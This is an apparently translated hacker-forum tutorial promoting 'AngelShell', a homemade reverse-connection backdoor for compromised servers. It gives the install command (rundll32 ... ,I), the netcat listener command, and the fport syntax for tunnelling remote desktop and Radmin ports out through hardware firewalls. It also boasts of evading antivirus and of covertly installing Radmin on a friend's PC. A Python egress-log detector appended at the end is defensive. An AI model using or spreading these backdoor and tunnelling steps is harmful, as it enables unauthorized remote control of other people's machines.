Nowadays almost every server sits behind a hardware firewall. After finally getting in, I found that a hardware firewall was installed, which was a real letdown! Terminal services, Radmin and other remote-control methods are out of the question. After trying them, I found that almost all of them support reverse connections; forward connections could only reach ports 80 and 21, and even 1433 could not be reached. Then I sent over a reverse-connection backdoor, and it was killed by the antivirus software. In a fit of anger I dug out Delphi and wrote a backdoor myself! After a few days the backdoor was finished and met my requirements. It worked very well, well enough to be called the nightmare of hardware firewalls and intranet broilers (compromised machines)! I couldn't keep it to myself, so I am sharing it with you.
This program is called AngelShell, and I will test it here on one of my broilers. First you need to write a local file holding the reverse-connection information: the first line is your own IP and the second line is the port you will listen on with NC. Once written, put it on some HTTP space, then configure the server: set the password and the HTTP access address of the file you just uploaded to the FTP space.
You can choose to generate either a DLL server or an EXE server. The EXE server can be installed directly, while the DLL server must be installed with the command "rundll32 <dll path>,I"; remember that the trailing I must be uppercase.
Tip: the EXE server is provided purely for convenience. It is essentially the DLL program packaged with code that unpacks and installs it automatically.
Here I will demonstrate with the DLL server. First upload the DLL to your beloved broiler, then type "rundll32 ,I" at the command line. Note that I was connected to the broiler via FTP, so for convenience I installed it directly from the FTP command line.
After installing it, listen on port 7787 on your own machine with "nc -v -l -p 7787"; that is the port written in the configuration file earlier. After a while NC reported incoming data. Enter the password and press Enter. OK, the connection succeeded: the help text was displayed and the cute shell appeared.
Tip: this backdoor also provides some extra commands that can be executed directly in the shell. To avoid conflicts with existing program names, all extra commands are lowercase.
So far you may think this backdoor is nothing special apart from being able to generate an EXE server. Of course, these features alone are not what makes it distinctive, nor would they make it a nightmare for hardware firewalls. The backdoor used here not only makes a reverse connection itself, it also lets every other program that normally needs a forward connection, such as terminal services, Radmin, MSSQL and so on, work over a reverse connection! Haha, don't be surprised, the good part is coming and I won't disappoint you. Let's go!
Did you notice the extra command fport in the shell? That is port forwarding: it can reverse-map any port of the remote computer to your local machine. What? You don't understand? Haha, never mind, just read on and you will see. Let's test Windows terminal services first. I had enabled terminal services on this broiler earlier but could never connect because the hardware firewall blocked it. Today I am going to enjoy myself!
Tip: how to use fport:
fport <local port> <Your IP> <YourPort>
The parameter local port is the port on the broiler you want to forward, Your IP is your own IP (or domain name), and YourPort is the port you listen on with the client.
Open the client, enter 3389 in "Port to be simulated" and anything you like in "Port to connect to the remote computer"; of course, it must not conflict with a port that is already open. Here I enter 7788, then click "Start Listening". Now quickly type in the broiler's shell: "fport 3389 61.187.***.*** 7788", where 3389 is the terminal-services port on the broiler and 7788 is the port on our side that the remote computer connects to. The client immediately reports that the connection from the remote computer has been received and that local port 3389 can now be connected to. In this way we have moved the broiler's port 3389 onto our own machine.
Friends, what are we waiting for? Open the terminal services client, enter the local address 127.0.0.1 as the IP, and the client immediately shows that a new connection has been established and a remote desktop login dialog appears. I was too excited for words!
Let's try logging in as two users: the client shows another new connection established, and logging in as two users at once also worked! Of course you can log in as more users if you like. When programming it I made each connection transfer data with two threads, so throughput is guaranteed.
Just as I was basking in the joy, the phone rang. A girl (an MM) had bought a webcam and wanted me to help her install it. Did I really have to go over there? So I asked her to get on QQ and let me do another test. Although this MM has no hardware firewall, she uses Windows XP Professional on an intranet. I first sent her the EXE server, asked her to run it, and then listened locally. After a while it reported that the message had arrived and I needed to enter the password. After entering the password I got a shell, then used the file-download function to install Radmin for her. Sneaky! Then I typed the following command: "fport 4899 61.187.***.*** 7788", forwarding her port 4899 to my port 4899, opened Radmin Viewer locally, entered 127.0.0.1 as the IP, connected on the default port 4899, and it connected successfully!
I opened Device Manager for her and installed the camera driver in a few seconds. The MM was still stunned and had no idea what had happened. Haha, when she finally caught on she was full of admiration and insisted on taking me as her teacher; I was sweating... The test ends here, and you can imagine how pleased I was, haha!
In theory this program supports any protocol, but because of the peculiarities of some protocols, which verify the IP, it may not achieve the effect we want. For example, the web service: today I forwarded port 80 from the broiler and wanted to fool people into thinking I had put up a website. Instead every request came back with "No web...in this ...", which roughly means there is no web service at this address. Then I remembered that the Host value in the HTTP protocol did not match. No wonder.
Finally, let me talk about how to use this program from inside an intranet. If you are on the intranet, you need a broiler that allows forward connections to act as a relay. Forward the port of the server you want to reach to this relay broiler, and then connecting directly to the relay broiler is equivalent to connecting to the server!
Okay, I hope this article helps you. If friends have read this far, I am already very grateful. Finally, I wish you all lasting happiness and flourishing skills!
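The pattern walked through above (a config file fetched over HTTP, an outbound connection from the server to the listener port, then further outbound tunnels for each forwarded port, all initiated by a rundll32-hosted DLL) only works because the perimeter firewall filters inbound traffic and lets any outbound connection through. The following is an added detection example from the defender's side, not code from the article or its program: it runs an egress-policy check over constructed connection records; the record layout, host names, addresses, egress policy and process list are all assumptions.

```python
"""Egress-log detector for the reverse-connection footprint described above.
Added example; record layout, hosts, addresses and policy are assumptions."""
import ipaddress
from collections import defaultdict

# Constructed outbound-connection records from a server segment:
# (timestamp, source host, destination IP, destination port, initiating process).
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges standing in for real outside IPs.
SAMPLE_CONNECTIONS = [
    ("2004-05-01T10:00:01", "web01", "10.0.0.53", 53, "svchost.exe"),
    ("2004-05-01T10:00:05", "web01", "203.0.113.10", 80, "rundll32.exe"),    # fetches the config file over HTTP
    ("2004-05-01T10:00:09", "web01", "203.0.113.10", 7787, "rundll32.exe"),  # reverse connection to the listener
    ("2004-05-01T10:02:30", "web01", "203.0.113.10", 7788, "rundll32.exe"),  # fport tunnel carrying port 3389
    ("2004-05-01T10:05:00", "db01", "10.0.0.53", 53, "svchost.exe"),
    ("2004-05-01T10:06:00", "db01", "198.51.100.7", 80, "wuauclt.exe"),       # permitted update traffic
]

# Assumed per-host egress policy: destination ports a server may open outbound.
EGRESS_POLICY = {"web01": {53, 443}, "db01": {53, 80}}
# Host processes that should never initiate outbound TCP from a server.
SUSPECT_PROCESSES = {"rundll32.exe", "regsvr32.exe"}
# RFC 1918 ranges count as internal; everything else is treated as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def detect(connections, policy=EGRESS_POLICY, suspect=SUSPECT_PROCESSES):
    """One finding per external connection that breaks egress policy, is started by a
    suspect process, or is the third+ distinct port from one host to one external IP
    (the listener-plus-tunnels fan-out that reverse port forwarding produces)."""
    findings = []
    ports_seen = defaultdict(set)  # (host, destination IP) -> distinct destination ports
    for ts, host, dst, port, proc in connections:
        if not is_external(dst):
            continue
        ports_seen[(host, dst)].add(port)
        reasons = []
        if port not in policy.get(host, set()):
            reasons.append("port-not-in-egress-policy")
        if proc.lower() in suspect:
            reasons.append("suspect-process")
        if len(ports_seen[(host, dst)]) >= 3:
            reasons.append("multi-port-fanout-to-one-external-ip")
        if reasons:
            findings.append({"ts": ts, "host": host, "dst": f"{dst}:{port}",
                             "process": proc, "reasons": reasons})
    return findings
```

On the constructed sample only the three web01 connections to 203.0.113.10 are flagged; the db01 update traffic passes because port 80 is in its policy and the process is expected.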